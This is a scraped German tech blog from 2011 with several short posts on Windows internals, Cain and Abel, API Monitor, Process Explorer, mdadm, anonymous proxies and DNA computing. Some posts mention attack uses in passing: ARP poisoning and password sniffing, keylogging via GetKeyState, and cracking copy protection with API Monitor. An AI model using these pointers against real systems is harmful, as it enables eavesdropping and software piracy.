Mir ist noch ein interessanter IT-Security Aspekt eingefallen, der in so manchen Netzwerk und Unternehmen bestimmt nicht umgesetzt wird. Und zwar ist einigen bekannt bekannt das Windows die Pagefile.sys als Auslagerungspartition benutzt (Unix "Swap") wird. Standardmäßig befindet sich die Systemdatei unter C:\pagefile.sys abgelegt im Normalfall wird die größe automatisch verwaltet sprich Windows kümmert sich um die Größe.  Diese wird beim normalen Herrunterfahren standardmäßig nicht nicht gelöscht!






Cain und Abel - Men in the Middle Sniffer

Hallo zusammen! Dieses Programm darf ausschließlich nur dafür benutzt werden um Penetration Tests zu durchzuführen!
Für Systemadministratoren jeglicher Unternehmen  sollte Cain und Abel von oxid.it ein Begriff sein.
Es Ermöglicht eine viel zahl von Angriffsvektoren (ARP spoofing / poisoning, Bruteforce, HTTPS, Passwort Sniffer, VoIP Sniffer etc.) zu überprüfen, es läuft ab Windows XP oder auch Windows 2000 bis Windows 7, es soll aber auch unter Windows 2008 Terminal Server laufen. Das Programm benutzt die weit verbreitete Winpcap Bibliothek. Für welche es auch schon CSharp Bibliotheken für die Entwicklung gibt.


Montag, 6. Juni 2011

Debian Server - Unix Software RAID System mdadm

Hallo,
ich wollte mal kurz eine Unix / Debian Software RAID Lösung vorstellen und zwar mdadm von Neil Brown! Es unterstützt verschiedene RAID-Level. Wobei RAID 1 wohl am gebräuchlichsten ist, und war das Spiegeln von Festplatten. mdadm ist inzwischen der Standard für Software RAIDs geworden und arbeitet Kernel-nah, weil Neil Brown auch Kernel Developer ist :-)
Neil Browns Blog informiert über die neuste Version, allerdings finden sich detailliertere Information auf Kernel.org jeweils zur neusten Version von mdadm. Es ist allerdings nicht zwingend erforderlich auf die neuste Version zu wechseln, weil sich an den wesentlichen Informationen nichts ändert....

Sonntag, 5. Juni 2011

Anonym Surfen: Google Web Proxy verwenden

Wer es noch nicht wußte, Google besitzt einen Proxy mit dem anonym gesurft werden kann. Dieser Proxy kann gerade für Leute interessant sein, die Mobil mit ihrem Smartphone surfen wollen! Bei dem Google Proxy lässt sich das Laden der Bilder abschalten und somit Bandbreite sparen, was sehr sinnvoll sein kann wenn ein Mobilvertrag mit Transfervolum vorliegt.Die Webseite wird in einer reduzierten Form ausgegeben!
Praktisch ebenfalls, das man von dieser Seite direkt auf Google suchen kann.
Getestet werden kann der Google Proxy mit dem Aufruf von http://www.wieistmeineip.de/ es lässt sich erkennen die IP verändert und zwar auf "66.249.82.195". 


Wer doch lieber anonym surfen möchte mit der kompletten Webseite dem empfehle ich anonymouse Proxy. Dieser zeigt die komplette Webseite an und surft anonym (193.200.150.125).


Viel Spaß :-)

Windows API Monitor - zur Programmanalyse

Hallo heute möchte ich euch mittels eines API Monitors zeigen, wie man man tiefe Einblicke in die Windows Systemebene erhält. Ich kenne das Programm noch von früher es wurde die Entwicklung der Version 1 im Jahre 2001 eingestellt und seit Juli 2010 als komplett neue Fassung veröffentlicht. Es befinden sich 10,000 API’s in 168 Kategorien!

rohitab bietet einen sehr guten API Monitor an, welcher die Funktionen übersichtlich präsentiert. Es wird derzeit an dem API Monitor Version zwei gearbeitet. Der API Monitor kommt in 32 Bit sowie 64 Bit daher.
Es sei angemerkt das sich mit der 32 Bit Version die Prozesse welche unter 32 Bit laufen Monitoren lassen und mit der 64 Bit Version eben 64 Bit Prozesse. Als erstes wird in der linken oberen Programmhälfte ausgewählt welche API Funktionen man überwachen möchte.

Der große API Katalog von API Monitor v2


Kategorien: 431
Variablen: 10702
DLLs: 172
APIs: 10341
COM Interfaces: 843
COM Methods: 10449


  • Administration und Mangement API
  • Component Development API
  • Data Access and Storage API
  • Delta Compression API
  • Diagnostics API
  • Documents and Printing API
  • Graphics and Multimedia API
  • Messaging and Collaboration API
  • Monitor Configuration API
  • Netcape Protable Runtime API
  • Network Security Services (NSS) API
  • Networking API
  • NT Native API
  • Office Development API
  • Security API
  • System Services API
  • Virtualization API
  • Web Development API
  • Windows Application UI Development API
  • Windows Driver Kit API
  • Windows Environment Development API
Bedienung von Windows API Monitor
Wie bereits erwähnt erst die API Funktionen aktivieren. Interessant ist z.B. System Services -> File Services oder auch Memory Management aber auch Security -> Cryptography. Wenn ihr euch für die Bereiche entschieden habt, seht ihr unten die laufenden Prozesse einfach Rechte Maustaste "Hook". Nun taucht das Programm in der Liste der "Hookes Processes" auf. Der Monitor ist jetzt aktiv. Es lassen sich auch mehrere Programme zeitgleich beobachten. Zur schnelleren Navigation sieht man die einzelnen Threads. 
Genauso verhalt es sich mit den "Services", welche allerdings Adminstrator Rechte erfordern. 

Arbeitsspeicher im Windows API Sniffer verändern
Unter "Hooked Processes" erhält man die Möglichkeit direkt im Arbeitsspeicher den Prozess oder seine Programmbibliotheken zu editieren. Das Programm erlaubt sogar geschützten Speicher zugänglich zu machen!
Wahlloses editieren im Speicher führt zwangsläufig zu einem Programmcrash. 

Arbeiten mit Breakpoints 
Es lassen sich Unterbrechnungspunkte setzen "Before Call", "After Call", "On Error", "On Exception". Was beeindruckend ist, ist die Funktion den API Call bevor er aufgerufen wird abzufangen! Man hat die Möglichkeit in dem Fenster für die Breakpoints auf "Break" zu klicken, dies führt eine injection im Thread durch und markiert die Position. Mit Ollydbg2 oder Win32DASM (Trail) sich an den Prozess anhängen "Attach" und im Call Stack sollte soetwas wie apimonitor-drv-x86.sys stehen...Using API Monitor to crack copy protected software.

Kleine Netzwerkanalyse mit rohitab WinAPI Monitor
Im API Katalog -> Network API -> Network Protocols (alles anharken) oder gleich Winsock 2 (mswsock.dll). Nun zum Beispiel Miranda überwachen und man sieht z.B. die gesendeten und verschickten Nachrichten unter "recv" sieht man im Hex / String Buffer die Daten!

Fazit
Praktisches Tool um z.B. seine eigene Anwendung zu überprüfen ob dort Fehler auftauchen, aber auch im das Dateisystem zu überwachen wie es Tools wie FileMon oder RegMon von Sysinternals machen! Der API Monitor funktioniert natürlich Programmiersprachen übergreifend und ermöglicht einen guten Einblick in welcher Reihenfolge und an welchen Stellen im Speicher (offset) die Befehle ausgeführt werden! Auch zur Cryptoanalyse stelle ich mir das interessant vor. Wollen wir mal schauen was es morgen neues gibt :-)


Samstag, 4. Juni 2011

Programmierung: Möglichkeiten der Windows API erkunden und nutzen

Windows Application Programming Interface (API) wird bei Programmieren auch WinAPI genannt. Die Windows API ist eine Programmierschnittstelle und Laufzeitumgebung, welche Programmierern bereitsteht, um Anwendungsprogramme für Microsoft Windows-Betriebssysteme zu erstellen.

Es wäre aus Softwareentwickler wirklich nicht schön, wenn man unter der Programmiersprache Java,Python, VB, .NET die einzelnen Befehle sind Library (Laufzeitbibliotheken) *.dll untergebracht. Beim Zugriff auf die WinAPI wird zwischen User-Mode und Kernel-Mode  unterschieden. Lange Zeit sah Microsoft es nicht ein, die Windows API offen zur Verfügung zu stellen und wurde dafür vor Gericht unter anderem belangt.
Es fehlten und fehlen bis heute wahrscheinlich immer noch Betriebssystem Funktion! Das .NET Framework verhält sich wie andere Programmiersprachen auch und erzeugt Wrapper  um die API Funktionen, damit man die für die Sprache üblichen Befehle verwendet. Ein simples Windows Fenster kann CreateWindowEx erzeugt werden, die der Befehl z.B. bei Python aussieht kann sich unterscheiden!

Simple Analyse der Kernel32.dll


Im Bildschirmphoto kaum zu erkennen, aber innerhalb der Kernel32.dll befinden sich die Klartext Namen der einzelnen API Funktionen. In diesem Fall Kernel-Mode API Funktionen, welche natürlicherweise höhere Rechte erfordern. Weitere elementare Bestandteile der Windows API wären die gdi.dll, welches sich um die Grafische Darstellung von Objekten kümmert, dieser wird in naher Zukunft von WinFX ( Windows Presentation Foundation) abgelöst und setzt komplett auf DirectX, weitere wichtige API Bibliothek ist die user32.dll.




Wofür und warum man die Windows API manchmal trotzdem braucht


Du möchtest einen systemweiten Keylogger programmieren. Dafür musst ja sämltiche Tastatureingaben in dem Betriebssystem mitbekommen. Dies wird über die API GetKeyState aus der user32.dll ermöglicht.
Du möchtest ein Programm schreiben, welches ein anderes Programm fernsteuert, weil es keine direkte Schnittstelle zur Anwendung geht. Es gibt dort dann die Möglichkeit 1 die Maus und Tastatur über die Windows API dazu zubewegen ein Ablaufschema, also die Bedienung von dem Programm zu übernehmen. Möglichkeit 2 das Fenster über SendMessage aus der user32.dll direkt mit Nachrichten zu befeuern und auch auf die Ereignisse der Nachricht zu reagieren. Oder wer sich ein Prozess Explorer bauen möchte muss auch auf API's zurückgreifen
Einige spezielle Funktionen stehen natürlich nicht in der jeweiligen Programmiersprache zur Verfügung und müssen über die Windows API angedockt werden. Es lassen sich damit z.B. auch verschiedenste Dialoge von Windows aufrufen und einbinden und zwar nicht über die alte rundll32.exe welche das auch erlauben würde. Aber auch z.B. die Lautstärke in einem eigenen Programm zu regeln erfordert die API.

Überblick im Chaos der Windows API Funktionen behalten


In der MSDN befindet sich eine Liste der API Funktionen nach Kategorien sortiert. Diese sind sehr allgemein gehalten. Wer sich mit Visual Basic (VB) auseinandersetzt wird diese API Liste von vbarchiv lieben, es finden sich meist zu jeder API Beispiele wie man genau mit der API arbeitet. Allerdings ist diese Liste ziemlich inkomplett.
Credits möchte ich noch ActiveVB geben, die ein kleines aber feines Tool geschrieben haben den API-Viewer es ist nicht so umfangreich wie die API Liste von vbarchiv, aber sie waren die ersten, die versucht haben die API's zu sammeln! Im Bereich Tipps & Tricks befinden sich viele Tricks für .NET und VB.

Die Windows API nachbauten
Wine: Ein Open-Source-Projekt mit dem Ziel, eine vollständige Win32-API für Linux- und UNIX-artige Betriebssysteme zu erstellen. Die Bibliotheken werden z.B. vom freien Betriebssystem ReactOS verwendet, oder auch von DarWine (heute Winebottler) eine Möglichkeit unter Mac OS X Windows Programme zu starten.

In weiteren Artikeln werde ich die Programmierung mit WinAPI und nen API - Monitor vorstellen!


Alternativer Taskmanager für Windows - Process Explorer

Hallo da bin ich wieder, viele von euch werden das Programm vielleicht schon kennen. Es ist der wesentlich bessere Taskmanager und hat den verheißungsvollen Namen Process Explorer v14.12. Einfach das Process Explorer Archiv runterladen. Die Exe-Datei starten zustimmen und schon hat man einen wesentlich besseren Übblick über die gestarteten Programme, weil diese als Baum Ansicht dargestellt werden. Man erkennt sofort wininit.exe und Explorer.exe als Wurzelknoten! Das geniale die Icons vom Programm werden gleich angezeigt so wird es auch bei cryptischen EXE Namen möglich schnell zu erkennen worum es sich handelt, aber dafür gibt es ja auch noch das Beschreibungsfeld. Sysinternals Process Explorer arbeitet mit Windows XP, Windows Vista, Windows 7, Windows Server 2003, Windows Server 2008 und höher.

Windows Taskmanager ersetzten mit Process Explorer
Im oberen Programmmenü befindet sich "Options" -> "Replace Taskmanager". Wird dies ausgeführt befindet sich beim Affengriff STRG + ALT + ENTF jetzt der neue Taskmanager. Es wird nicht wie man annehmen könnte die taskmgr.exe überschrieben sondern in der Registry getrickst.

Prozesskerne im Blick und den verbrauchten Arbeitsspeicher, Festplatten Aktivität....

Process Explorer öffnet sich nicht mehr HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe dort befindet sich die Zeichenfolger "Debugger" mit der Pfadangabe zum Prozess Explorer.
Einfach Debugger umbenennen und in Echtzeit erhält man wieder Zugriff auf den alten Taskmanager (taskmgr.exe).

Alternativen Taskmanager einrichten
Mit Rechte Maustaste auf eine der Spaltennamen ermöglicht es den Taskmanager  bequem anzupassen. Es bietet z.B. Security Feature anzeige wie DEP oder ASLR an. CPU Zeit die ein Programm verbraucht hat, wieviel Speicher belegt wird, wann und von wo das Programm gestartet wurde, unter welchem Benutzer es läuft und noch viel viel mehr. Einfach erkunden und nach eigenen wünschen anpassen.

Process Explorer kann mehr....DLL und Handles anzeigen
Mit dem Process Explorer könnte man sogar das Rootkit TDSS4 / TDL ausmachen, weil es eine cmd.dll an jeden Prozess anhängt. Diese kann z.B. einfach gesucht werden! Es lassen sich einzelne Handles schließen, was manchmal gebraucht werden kann wenn z.B. eine Datei irgendwie gesperrt sein sollte. Es lassen sich auch komplette Dump's also ein Speicherabbild der Anwendung erstellen für weitere Analysezwecke.

Ein Wunder das Microsoft die aufgekauften Komponenten wie Process Explorer oder ShareEnum nicht in Windows 8 integriert. Aber im wesentlichen passiert gerade im UR-alt Taskmanager von Windows nicht viel neues!

Fortschritt bei DNA - Computer - Biocomputer und Ihre Möglichkeiten

Als DNA-, RNA- oder allgemeiner auch Biocomputer werden Computer bezeichnet, die auf der Verwendung der Erbsubstanz Desoxyribonukleinsäure (DNA) oder Ribonukleinsäure (RNA) als Speicher- und Verarbeitungsmedium beruhen. Sie stellen einen Bereich der Bioelektronik dar. 
Ein DNA Strang besteht normalerweise aus: 
Phospor (P), Zucker (Z), Adenin (A), Thiymen (T), Cytosin (C), Guanin (G). Diese Bestandteile können Verbindungen eingehen und somit Rechnen. Die hohe Dichte von DNA entsprechen Sechs Gramm DNA in einem Liter Flüssigkeit, ungefähr drei Trilliarden Bytes speichern. 
Die Entwicklung von Biocomputern befindet sich noch in der Anfangsphase. Die ersten theoretischen Anstöße, dass Datenverarbeitung auf der Basis biologischer Moleküle möglich sein muss, lieferte der Nobelpreisträger Richard Feynman, Begründer der Nanotechnologie, in einem Vortrag zum Ende der 1950er Jahre.
1994 präsentierte Leonard Adleman mit seinem TT-100 den ersten Prototypen eines DNA-Computers in Form eines Reagenzglases mit 100 Mikrolitern DNA-Lösung. Mit Hilfe dieses Gerätes konnte er durch freie Reaktion der DNA einfache mathematische Probleme lösen.Pro Sekunde ergeben sich etwa 1 Million Tera-Operationen, während die leistungsfähigsten Computer heute gerade mal eine Tera-Operation pro Sekunde erreichen.


In einem neueren Beitrag des Wissenschaftsmagazins Science wurden die sogenannten "Seesaw-Gates"  ("Wippen") vorgestellt. die DNA-Einzelstränge in bestimmten Positionen hybridisieren lassen - und dann die beiden Booleschen Werte True und False darstellen. Desweiteren sind Schaltungen mit "UND" / "ODER" möglich. Es lassen sich damit z.B. Quadratwurzeln ziehen allerdings dauert der Vorgang aufgrund der chemischen Reaktionen pro Seesaw-Gate 30-60 Min insgesamt bis zu 10 Stunden. Bis Reaktionen in einer schnelleren Zeit ablaufen, also praktischer weise im Sekunden bereich können werden noch einige Jahre vergehen. 


Biocomputer als heilende Kräfte?
Man bekommt eine punktgenaue Spritze in z.B. einen Tumor. Dieser wird mit einem kleinen Minisystem "infiziert" welcher eigenständig seine Umgebung analisieren kann. Es wird z.B. die Zerstörung der Zellen berechnet und Gegenmaßnahmen eingeleitet um den Tumor zu isolieren und zu schrumpfen. Der Computer im Menschen eine wirklich befremdliche Idee, die sicherlich kommen wird! 


Ultra Parallelität - Kryptoanalyse / Kryptografie 

Es wird vorausgesagt, dass DNA-Computer vor allem dort neue Lösungen liefern können sollen, wo sie sich von „traditionellen Computern“ unterscheiden: In der Speicherkapazität und in der Parallelisierung. Ein Anwendungsfeld ist damit z. B. Kryptoanalyse, indem massiv parallel alle möglichen Schlüssel gleichzeitig ausprobiert werden. Dies würde moderne Verschlüsselungen, die mit heutigen Computern nicht zu brechen sind, untauglich machen.
Die Realisierung des DNA-Computers scheitert aktuell vor allem an technischen Problemen. Das Ziel der derzeitigen Forschung ist es, ein Hybridsystem zu schaffen, bei dem der DNA-Technologie elektronische Baugruppen vorgeschaltet werden. Mit dem Seesaw-Gate bewegt sich das schon in die richtige Richtung! 

Mitfahrsystem OpenRide als Java Open Source veröffentlicht

Das Fraunhofer-Institut für Offene Kommunikationssysteme hat vor ein paar Tagen OpenRide veröffentlicht. Eine Quelloffene Mitfahrzentrale, welche mit der Programmiersprache Java entwickelt wurde. Der Quellcode befindet sich unter Sourceforge SVN Browsen. Die komplette WebApp läuft im Browser ab.

Das Fraunhofer Institut hat eine Demoversion von OpenRide veröffentlicht (nur zum ansehen nicht zum vermitteln von Fahrten). Die Registierung klappt und man erhält einen Überblick über die Profildaten die ein Member in seinem eigenen oder einem fremden Mitfahrer Dienst anzugeben hat. Es kann die komplette Wohnhaft interlegt werden, als Fahrer gibt es dann noch das Automarke, Autofarbe, Kennzeichen, desweiteren lässt Nichtraucher/in und Raucher/in.
Es lässt sich auch ein Profilbild hinterlegen und auch Fahrer bewerten!
Was etwas störend auffällt das man ein automatisch generiertes Passwort angezeigt bekommt, welches nicht per Email geschickt wird. Passwort vergessen geht derzeit nur über eine Email Adresse.

Im Unterschied zu etablierten Lösungen für Mitfahrgelegenheiten vermittelt OpenRide Fahrten spontan von unterwegs und auch für kurze Fahrstrecken. Damit erschließt OpenRide den Markt für das bisher ungenutzte Potential an freien Transportkapazitäten im Individualverkehr. Dafür wird das Angebot vom Fahrer seine Wegstrecke vergleichen mit einem der eine Mitfahrgelegenheit sucht. Die Fahrtkosten sollen transparent zur Verfügung stehen. OpenRide ist unabhängig von einzelnen Softwareherstellern und bei Bedarf miteinander verbinden, um so Mobilitätsnetze zu schaffen.


Mit OpenRide kann jeder, ob Großunternehmen oder Privatperson, eine eigene Mitfahrzentrale für dynamische Fahrgemeinschaften betreiben:

  • Unternehmen nutzen OpenRide, um Ihren Mitarbeiter die spontane Bildung von Fahrgemeinschaften zu ermöglichen, z.B. für die Fahrt zur Arbeit.
  • Gebietskörperschaften nutzen OpenRide, um Ihr Mobilitätsangebot zu ergänzen und zu erweitern und Ihren Bürgern zusätzlichen Service zu bieten.
  • Veranstalter bieten Ihren Kunden und Besuchern mit OpenRide die Möglichkeit gemeinsam, schnell und effizient zum Ort des Geschehens zu gelangen.


Mobil lässt sich OpenRide nutzen mit iPhone 3G, Android-Mobiltelefone ab Android 2.1. und Windows Mobile ab Version 6.5. Auf Nokia-Smartphones kann man OpenRide nutzen, wenn man den Opera Mobile-Webbrowser installiert.

Es gibt auch eine OpenRide Bedienungsanleitung mit einigen Screenshots

Etwas verstörend finde ich, dass es keine Dokumentation gibt wie man einen Java Server aufbaut, wie man die Datenbank einrichtet etc. Dies würde ich bei einem Open Source Projekt schon erwarten, aber vielleicht kommt es ja noch. Ebenso fehlt mir die Möglichkeit das System Live irgendwo zu testen, also ein Verweis auf ein Livesystem.
Wer Plattformen mit OpenRide findet kann sie mir gerne als Kommentar posten!